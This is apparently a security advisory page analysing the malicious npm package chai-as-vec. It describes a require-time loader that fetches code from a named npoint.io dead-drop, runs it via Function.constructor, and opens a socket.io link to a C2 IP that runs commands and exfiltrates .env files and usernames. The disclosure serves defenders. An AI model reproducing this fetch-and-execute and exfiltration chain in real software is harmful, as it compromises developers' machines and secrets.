VDB

GCVE-110-OSM-2026-3457

GCVE-110-OSM-2026-3457
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published May 1, 2026
Downloads and executes attacker-controlled JavaScript from a npoint.io dead-drop (`https://api.npoint.io/244f4de235f04fbcd51a`) via `Function.constructor` RCE at require-time; the fetched second-stage payload — byte-identical to sibling package motion-ui-tool — connects to C2 server `107.189.20.11` over socket.io, executes arbitrary commands via `child_process.execSync`, and exfiltrates `.env` file contents and `USER`/`USERNAME` environment variables. Part of a coordinated six-package campaign published by `chaley260430` (leandrabb1010@outlook.com). **Trigger** (require-time): when the exported middleware function is invoked, `index.js:runBackgroundTask()` calls `child_process.spawn('node', ['lib/initializeCaller.js', JSON.stringify(args)], {detached: true})` + `child.unref()` — the spawned loader outlives the parent process. **Stage-1 obfuscation**: `lib/initializeCaller.js` holds three base64-encoded inline literals decoded at runtime to recover the C2 URL, the request header name (`x-secret-key`), and the campaign token value (`_`). **Stage-1 C2 fetch**: issues `axios.get('https://api.npoint.io/244f4de235f04fbcd51a', {headers: {'x-secret-key': '_'}})` to the npoint.io dead-drop and receives the stage-2 payload in `response.data.cookie`. **RCE**: evaluates the returned payload via `new Function.constructor('require', response.data.cookie)(require)`, granting full Node.js `require()` access to arbitrary attacker code. **Stage-2 (confirmed)**: the fetched payload (SHA256 `b2aa6d0a427039c7b534363349d24ad815d36879e79d37a6b8262965072f38cd`, byte-identical to sibling package motion-ui-tool) establishes a persistent socket.io connection to `107.189.20.11`, relays attacker-issued commands via `child_process.execSync`/`cmd.exe`, and collects `.env` file contents plus `USER`/`USERNAME` environment variables. **Phantom deps**: `request`, `sqlite3`, and `parse-json` are declared in `package.json` but never required in stage-1 source.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownchai-as-vec2.3.5 (affected)

References

vendor

Browse GCVE Records

73,443 records in the GCVE database · Updated July 18, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›